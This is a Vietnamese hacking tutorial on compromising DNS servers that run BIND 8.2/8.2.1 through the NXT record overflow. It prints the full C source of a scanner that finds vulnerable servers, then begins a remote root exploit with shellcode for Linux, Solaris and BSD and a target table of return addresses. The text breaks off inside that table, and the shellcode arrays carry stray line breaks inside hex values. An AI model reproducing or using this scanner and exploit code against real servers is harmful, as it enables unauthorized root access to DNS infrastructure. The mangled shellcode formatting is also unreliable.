Hack BIND 8.2/8.2.1 qua bug "NXT"
trang này đã được đọc
lần
Các máy chủ tên miền (DNS server) chạy BIND 8.2/8.2.1
không xử lí chính xác các record NXT. Điều này tạo điều kiện cho attacker có
thể làm tràn bộ đệm của BIND và thi hành các mã lệnh độc đoán trên máy chủ
tên miền mà cụ thể nhất là lấy root (theo CA-99-14, ngày 10/11/1999)
Dưới đây là cách để hack các máy chủ tên miền chạy BIND 8.2/8.2.1 gặp bug
"nxt" nhưng chưa được patch
Bước 1:
scan các DNS server gặp bug "nxt" bằng CBIND
/* BIND NXT vulnerable SCANNER - CBIND */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wait.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* DO NOT EDIT THIS LINE */
#define SCAN_EXE "./nmap -p 53 "
/* EDIT: directory of NMAP */
#define SCAN_DIR "/home/lb0gspm/tmp/nmap/"
/* EDIT: directory of CBIND and it's temporary files */
#define CBIND_DIR "/home/lb0gspm/tmp/cbind/"
#define R1_DIR "/home/lb0gspm/tmp/cbind/result1.cbind"
#define R2_DIR "/home/lb0gspm/tmp/cbind/result2.cbind"
int Scan( char *ip );
char *GetSubnet( char *ip );
char *ChangeSubnet( char *ip, char *subnet );
char *itoa( int i );
int main( int argc, char *argv[] )
{
struct in_addr addr;
struct hostent *host_entry;
unsigned short int option[3], i, wait_st;
unsigned char *name;
unsigned char *cmd;
unsigned char *ip, *subnet, *ip_s;
unsigned char *temp;
FILE *fp;
printf( "Check BIND v 2.00b \n" );
printf( "Bind NXT vulnerablity scanner\n\n" );
name = (char *)malloc( 200 );
ip = (char *)malloc( 16 );
ip_s = (char *)malloc( 16 );
subnet = (char *)malloc( 4 );
cmd = (char *)malloc( 50 );
if( argc == 1 )
{
printf( "Options: \n" );
printf( " -s SUB-NET SCAN ( SLOW BUT HIGH PRECISE )\n" );
printf( " -f SUB-NET SCAN ( FAST BUT LOW PRECISE / NMAP REQUIRE )\n" );
printf( " -i PRINT INFOMATION\n\n" );
printf( "Examples: \n" );
printf( " cbind victim.com ( IT WILL SCAN IF TARGET IS VULNERABLE OR NOT
)\n" );
printf( " cbind victim.com -s ( IT WILL SCAN ALL SUB-NETs IN DETAIL )\n" );
printf( " cbind -f victim.com ( IT WILL SCAN SUB-NETs LOW PRECISE )\n\n" );
exit(0);
} else {
option[0] = 0;
option[1] = 0;
option[2] = 0;
for( i = 1; i < argc; i++ )
{
if( strcmp( argv[i], "-s" ) == 0 )
{
if( option[2] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use option -s with -i.\n" );
exit(0);
}
printf( "Sub-net( high precise ) scan mode ACTIVATED.\n" );
printf( "It can takes long.\n\n" );
option[1] = 1;
continue;
}
if( strcmp( argv[i], "-f" ) == 0 )
{
if( option[1] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use options -f with -i.\n" );
exit(0);
}
printf( "Sub-net( low precise ) scan mode ACTIVATED.\n" );
printf( "It require NMAP 2.07 or higher version.\n\n" );
option[2] = 1;
continue;
}
if( strcmp( argv[i], "-i" ) == 0 )
{
if( (option[1] == 1) || (option[2] == 1) )
{
printf( "Can not use option -i with -s(or -f).\n" );
exit(0);
}
option[0] = 1;
continue;
}
strcpy( name, argv[i] );
}
}
if( geteuid() != 0 )
{
printf( "Error! You are not ROOT!\n" );
exit(0);
}
if( (name[0] <= '0') || (name[0] >= '9') )
{
host_entry = gethostbyname( name );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
addr = *((struct in_addr *)host_entry->h_addr);
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
if( (name[0] >= '0') && (name[0] <= '9') )
{
host_entry = gethostbyaddr( name, strlen(name), AF_INET );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
addr = *((struct in_addr *)host_entry->h_addr);
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) )
{
Scan( ip );
printf( "Scanning Done.\n" );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
}
if( option[1] == 1 )
{
for( i = 0; i < 256; i++ )
{
if( fork() == 0 )
{
strcpy( subnet, itoa( i ) );
ip_s = ChangeSubnet( ip, subnet );
Scan( ip_s );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
} else {
wait( NULL );
}
continue;
}
printf( "Scanning Done.\n" );
exit(0);
}
if( option[2] == 1 )
{
strcpy( cmd, SCAN_EXE );
strcat( cmd, name );
strcat( cmd, "/24" );
strcat( cmd, " > " );
strcat( cmd, R1_DIR );
chdir( SCAN_DIR );
system( cmd );
strcpy( cmd, "grep \"Interesting\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
if( ( fp = fopen( R2_DIR, "r" ) ) < 0 )
{
printf( "File Open Error!\n" );
exit(0);
}
while( 1 )
{
bzero( name, 200 );
temp = (char *)malloc( 200 );
strcpy( temp, " " );
temp = fgets( temp, 100, fp );
if( temp == NULL ) break;
if( temp[21] == ' ' )
{
for( i = 0; i < 16; i++ )
{
if( (temp[i+23] != ' ') && (temp[i+23] != ')') )
{
if( (temp[i+23] >= '0') && (temp[i+23] <= '9') )
{
name[i] = temp[i+23];
} else {
if( temp[i+23] == '.' )
name[i] = temp[i+23];
}
}
}
}
if( temp[21] != ' ' )
{
for( i = 0; i < 50; i++ )
{
if( temp[i+21] != ' ' ) name[i] = temp[i+21];
}
}
Scan( name );
free(temp);
}
remove( R1_DIR );
remove( R2_DIR );
}
if( option[0] == 1 )
{
printf( "Creator : Laks Bluesky\n" );
printf( "E-mail : lb0gspm@hanmail.net\n\n" );
printf( "Version : 2.00 beta\n\n" );
printf( "2000.06.19\n" );
exit(0);
}
}
char *itoa( int i )
{
char *ret;
char c;
int count;
ret = (char *)malloc( 4 );
count = 1;
if( i > 9 ) count = 2;
if( i > 99 ) count = 3;
if( count == 1 )
{
c = i+48;
ret[0] = c;
ret[1] = '\0';
return ret;
}
if( count == 2 )
{
c = i / 10;
i = i - (c*10);
ret[0] = c+48;
ret[1] = i+48;
ret[2] = '\0';
return ret;
}
if( count == 3 )
{
c = i / 100;
i = i - (c*100);
ret[0] = c+48;
c = i / 10;
i = i - (c*10);
ret[1] = c+48;
ret[2] = i+48;
ret[3] = '\0';
return ret;
}
}
char *ChangeSubnet( char *ip, char *subnet )
{
char *ip_s;
int count = 0, i = 0;
ip_s = (char *)malloc( 16 );
strcpy( ip_s, ip );
for( count = 0; count != 3; count = count )
{
if( ip_s[i] == '.' )
{
count++;
i++;
continue;
}
i++;
}
ip_s[i++] = subnet[0];
ip_s[i++] = subnet[1];
ip_s[i++] = subnet[2];
ip_s[i++] = subnet[3];
return ip_s;
}
char *GetSubnet( char *ip )
{
char *ret;
int count = 0, i = 0;
ret = (char *)malloc( 4 );
for( count = 0; count != 3; count = count )
{
if( ip[i] == '.' )
{
count++;
i++;
continue;
}
i++;
}
ret[0] = ip[i++];
ret[1] = ip[i++];
ret[2] = ip[i++];
ret[3] = ip[i++];
return ret;
}
int Scan( char *ip )
{
unsigned short int i;
unsigned char c;
unsigned char *cmd;
unsigned char *version;
FILE *fp;
struct stat result;
cmd = (char *)malloc( 200 );
version = (char *)malloc( 9 );
printf( "Scanning... %s\n", ip );
strcpy( cmd, "dig @" );
strcat( cmd, ip );
strcat( cmd, " version.bind chaos txt > " );
strcat( cmd, R1_DIR );
strcat( cmd, " 2> /dev/null" );
system( cmd );
strcpy( cmd, "grep \"VERSION.BIND.\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
stat( R2_DIR, &result );
if( result.st_size < 30 )
{
chdir( CBIND_DIR );
return 0;
}
if( ( fp = fopen( R2_DIR, "r" ) ) >= 0 )
{
for( i = 0; i < 29; i++ )
{
c = fgetc( fp );
}
for( i = 0; i < 9; i++ )
{
c = fgetc( fp );
if( c == '"' )
{
version[i] = '\0';
break;
}
version[i] = c;
}
} else {
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. \n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.1" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. \n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. \n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.2-P5" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.1.2" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
chdir( CBIND_DIR );
return 0;
}
* Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận
diện version của BIND
NSLOOKUP
# nslookup
Default Server: ns.yourco.bogus
Address: 333.333.333.333
> set class=chaos
> set type=txt
> version.bind
Server: ns.yourco.bogus
Address: 333.333.333.333
VERSION.BIND text = "8.2.2-P5"
>
DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>)
dig version.bind txt chaos @<server>
hoặc
dig @ txt chaos version.bind
Nếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug
"nxt"
Bước 2: lấy root shell bằng T666
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
char linuxcode[]=
{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x4
6,0x8,0x89,0x46,0x10,0x8d,
0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,
0xf3,0xb9,0x0,0x0,0x0,0x0,
0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x8
0,0x50,0x8d,0x5e,0x2,0xb9,
0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0
x8d,0x5e,0x2,0xb8,0x3d,0x0,
0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0, 0xcd,0x80,0x5b,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0
x0,0x0,0xcd,0x80,0x89,0xf3,
0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa
7,0xff,0xff,0xff,0x2e,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0 x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x 0,0x0,0x0,0xcd,0x80,0x89,
0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3 ,0x8d,0x4e,0xc,0x8d,0x56,
0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0
x0,0x0,0xcd,0x80,0xe8,0x75,
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74, 0x68,0x69,0x73,0x69,0x73,
0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70, 0x61,0x63,0x65,0x66,0x6f,
0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e, 0x61,0x64,0x64,0x72,0x69,
0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69, 0x6b,0x6e,0x6f,0x77,0x74,
0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62, 0x75,0x74,0x61,0x6e,0x79,
0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65, 0x73,0x68,0x6f,0x72,0x69,
0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f, 0x72,0x6b,0x69,0x6e,0x67,
0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f, 0x6c,0xeb,0x86,0x5e,0x56,
0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x 4,0x89,0xe1,0xbb,0x7,0x0,
0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4, 0xc,0x89,0xc0,0x85,0xc0,
0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x
56,0x4,0x4a,0x52,0x89,0xd3,
0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x 80,0x5a,0x52,0x89,0xd3,
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x 80,0x5a,0x52,0x89,0xd3,
0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x 80,0xeb,0x12,0x5e,0x46,
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0
,0xe9,0xfe,0xfe,0xff,0xff,
0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff, 0x2f,0x62,0x69,0x6e,0x2f,
0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0x ff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61
,0x67,0x75,0x65,0x7a,0x5b,
0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d} ;
char sc[]=
{0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0 xd5,0x92,0x10,0x20,0x0,
0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x 0,0x8,0x90,0x3,0xe0,0xcc,
0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,
0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0 x10,0x0,0x10,0x82,0x10,
0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x
82,0x10,0x20,0x6,0x91,0xd0,
0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x9 1,0xd0,0x20,0x0,0x90,0x3,
0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0 xa0,0x10,0x20,0x0,0x90,
0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x 0,0xa0,0x4,0x20,0x1,0x80,
0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0, 0x90,0x3,0xe0,0xc0,0xa0,
0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0x c9,0xe0,0x23,0xbf,0xf4,
0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0x
bf,0xfc,0x92,0x3,0xbf,0xf0,
0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0
x20,0x0,0x81,0xc3,0xe0,0x8,
0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73 ,0x68,0x0,0x2d,0x63,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0 x0,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0 x6f,0x72,0x69,0x7a,0x6f,
0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39, 0x39,0x0};
char bsdcode[]=
{0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0x
b0,0x17,0xcd,0x80,0x31,0xc0,
0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0
x28,0xb9,0xff,0x1,0x0,0x0,
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0 ,0xcd,0x80,0x8d,0x46,0x2,
0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x4
6,0x28,0x50,0x50,0xb8,0xa7,
0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50 ,0x50,0xb8,0xa6,0x0,0x0,
0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0
x50,0xb8,0x3d,0x0,0x0,0x0,
0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85 ,0xc0,0xf,0x85,0xe6,0x0,
0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x 40,0x89,0x46,0x2c,0x8d,
0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d, 0x46,0x28,0x50,0x52,0x50,
0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1 ,0x0,0x0,0x0,0xcd,0x80,
0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0, 0x0,0x62,0x6c,0x61,0x68,
0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68, 0x69,0x6e,0x67,0x79,0x65,
0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70, 0x61,0x63,0x65,0x66,0x6f,
0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72, 0x73,0x74,0x72,0x75,0x63,
0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69, 0x73,0x74,0x69,0x6d,0x65,
0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73, 0x68,0x65,0x6c,0x6c,0x63,
0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61, 0x74,0x6c,0x79,0x74,0x68,
0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b, 0x69,0x68,0x6f,0x70,0x65,
0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e, 0x6f,0x75,0x67,0x68,0x73,
0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0 x61,0x67,0x75,0x65,0x7a,
0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20, 0x63,0x72,0x61,0x70,0x70,
0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64, 0x65,0x20,0x2d,0x20,0x31,
0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff, 0xff,0x8d,0x46,0x4,0x50,
0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0
,0xcd,0x80,0x5a,0x83,0xf8,
0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,
0xb8,0x6,0x0,0x0,0x0,0xcd,
0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0
x0,0x0,0x0,0xcd,0x80,0x6a,
0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a ,0x2,0x52,0x52,0xb8,0x5a,
0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x4
6,0x46,0x46,0x8d,0x56,0x38,
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d
,0x46,0x34,0x50,0x8d,0x46,
0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x8
0,0xe9,0xc1,0xfe,0xff,0xff,
0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff, 0x2e,0x0,0x41,0x44,0x4d,
0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0 x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,
0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xf
f,0xff,0xff,0xff,0xff,0xff,
0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73 ,0x68,0x0,0x2d,0x63,0x0,
0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70, 0x2f,0x59,0x4f,0x59,0x4f,
0x59,0x4f,0x0};
char bsdnochroot[]=
{0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,
0x0,0xcd,0x80,0x85,0xc0,0xf,
0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x2
8,0x8d,0x46,0x40,0x89,0x46,
0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30, 0x50,0x8d,0x46,0x28,0x50,
0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x5 0,0xb8,0x1,0x0,0x0,0x0,
0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x ff,0x0,0x0,0x0,0x62,0x6c,
0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65, 0x74,0x68,0x69,0x6e,0x67,
0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72, 0x73,0x70,0x61,0x63,0x65,
0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64, 0x64,0x72,0x73,0x74,0x72,
0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74, 0x68,0x69,0x73,0x74,0x69,
0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73, 0x64,0x73,0x68,0x65,0x6c,
0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75, 0x6e,0x61,0x74,0x6c,0x79,
0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f, 0x72,0x6b,0x69,0x68,0x6f,
0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b, 0x65,0x6e,0x6f,0x75,0x67,
0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0 x70,0x6c,0x61,0x67,0x75,
0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53, 0x44,0x20,0x63,0x72,0x61,
0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x20,0x2d,
0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f, 0xff,0xff,0xff,0x5e,0x8d,
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x 1f,0x0,0x0,0x0,0xcd,0x80,
0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74 ,0xc,0x52,0x52,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52 ,0x52,0xb8,0x5a,0x0,0x0,
0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0 ,0x0,0xcd,0x80,0x6a,0x2,
0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2
9,0x5e,0x46,0x46,0x46,0x46,
0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,
0x0,0x0,0x0,0x0,0x8d,0x46,
0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,
0x0,0x0,0x0,0xcd,0x80,0xe9,
0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8, 0x82,0xfe,0xff,0xff,0x2e,
0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x 2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xf
f,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62
,0x69,0x6e,0x2f,0x73,0x68,
0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x 2f,0x74,0x6d,0x70,0x2f,
0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0};
struct arch
{
int id;
char *name;
char *code;
int codesize;
unsigned long safe;
unsigned long ret;
int length;
};
struct arch archlist[] =
{
{1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode,
sizeof(linuxcode), 0, 0xbfffd6c3, 6500},
{2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode,
sizeof(linuxcode), 0, 0x80f79ae, 6500},
{3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738,
0xffbedbd0, 11000},
{4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0,
11000},
{5, "Free